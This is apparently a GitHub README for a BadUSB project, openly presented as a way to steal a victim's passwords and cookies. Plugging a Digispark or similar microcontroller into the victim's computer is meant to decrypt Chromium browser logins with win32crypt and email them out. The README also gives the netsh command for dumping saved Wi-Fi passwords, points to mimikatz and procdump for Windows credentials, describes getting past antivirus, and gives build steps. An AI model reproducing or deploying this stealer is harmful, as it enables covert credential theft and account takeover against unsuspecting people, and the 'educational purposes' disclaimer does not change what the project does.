This project allows you to steal passwords and cookies of the victim by inserting a Digispark Attiny85, ATMEGA32U4 or another programming controller with this software and after few seconds you have all the data by mail
Just plug BadUSB and get all data
Everything in this repository is strictly for educational purposes. Notice I am not responsible for stolen data. You are responsible for your actions using developed script for BadUSB
All your data when working with a browser is cached. Since popular browsers like Chrome, Opera or Yandex Browser are chromium based browsers, all stored data on a computer has a similar structure.
The interesting for us data collected in database SQLite. The url, login fields are stored explicitly, but password must be decrypted by win32crypt. This type of encryption means that passwords can be extended only on the client’s computer and nowhere else. We run our program on the client, it uses the client's keys to decrypt passwords and send the decrypted data to our email. Moreover, we can also send cookies and another useful information.
For example, to get all the saved passwords from earlier connected Wi-Fi networks, you just need to type the command:
netsh wlan show profiles
It displays a list of all saved networks. For each network, you must write a command with name (ESSID) of the network. You can read more here
This way we get more victims information. MAC-addresses also can be extracted, using ipconig /all
Try to extract Windows user password using mimikatz, pypykatz and pypykatz + procdump
Based on the fact that antivirus programs define chrompass as malicious and do not allow it to be run, I had to write a program myself that receives all the data. My modified code sends data to the mail, while in the previous version of the program a powershell was involved in SMTP server creation.
Advantages:
Disadvantages:
Linux:
$ git clone https://github.com/kovinevmv/DigiSparkStealer
$ cd DigiSparkStealer
Windows: Click on green button on right top of main page. Then - "Download Zip"
pyinstaller --onefile main.py
First version is based on Nirsoft program - ChromePass
This software is very convenient and has own advantages. The company has developed software for recovering forgotten passwords. To see your passwords, you just need to run the program and get all your passwords saved on the PC in the "Login Data" file. Most antivirus programs, including Windows Defender, block this file, so most likely the result of this script is poor. Here is report. A PC with a disabled protector and no antivirus is required.
Remember that it only steals Chrome passwords. No more!!!
Advantages:
Disadvantages: